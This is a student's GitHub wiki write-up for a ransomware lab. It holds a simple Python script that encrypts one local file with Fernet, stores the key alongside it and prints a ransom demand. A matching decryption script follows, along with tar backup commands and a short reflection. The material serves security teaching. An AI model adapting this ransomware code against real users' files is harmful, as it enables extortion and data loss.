Project 4: Ransomware and Mitigation - FlameSpyro/Tech-Journal GitHub Wiki

Project 4: Ransomware and Mitigation

Demo Video

Ransomware Creation

  • In this lab I created a very simple script that encrypts a single file called important.txt.
  • This was all done within the xubuntu-lan machine and installed python 3 on the machine
sudo apt update
sudo apt install python3-pip
  • I created the ransomware script here:
# import required module
from cryptography.fernet import Fernet

# Create a key that will be used for encryption/decryption
key = Fernet.generate_key()
 
# string the key in a file
with open('filekey.key', 'wb') as filekey:
   filekey.write(key)

# opening the key
with open('filekey.key', 'rb') as filekey:
    key = filekey.read()
 
# using the generated key
fernet = Fernet(key)
 
# opening the original file to encrypt
with open('important.txt', 'rb') as file:
    original = file.read()
     
# encrypting the file
encrypted = fernet.encrypt(original)
 
# opening the file in write mode and 
# writing the encrypted data
with open('important.txt', 'wb') as encrypted_file:
    encrypted_file.write(encrypted)

# Message
print("You have been had! Pay me 1 billion bucks for the file to be decrypted!")
print(":)")

Decryption Script

  • I created a script that fetches the key from the previous script and decrypts it:
# import required module
from cryptography.fernet import Fernet

# opening the key
with open('filekey.key', 'rb') as filekey:
    key = filekey.read()
  
# using the key
fernet = Fernet(key)
 
# opening the encrypted file
with open('important.txt', 'rb') as enc_file:
    encrypted = enc_file.read()
 
# decrypting the file
decrypted = fernet.decrypt(encrypted)
 
# opening the file in write mode and
# writing the decrypted data
with open('important.txt', 'wb') as dec_file:
    dec_file.write(decrypted)

Prevention

  • Using tar, this command creates a backup of the chosen file(s) to compress into a .gz file:
tar -cf backup.gz important.txt
cp backup.gz <target dir>
tar -xvf backup.gz

Reflection

  • Ransomware is a very dangerous tool used by attackers that puts files under lock and key. Depending on the group, the attacker could receive payment and not even decrypt the files. Many scenarios could occur. Its important to monitor what occurs in your directories and create a proper and isolated backup to prevent this. When it comes t other creations of my ransomware it not exactly effective but could be modified for a more ethical-hacking environment but it accomplishes the goal of encrypting/decrypting files.
⚠️ **GitHub.com Fallback** ⚠️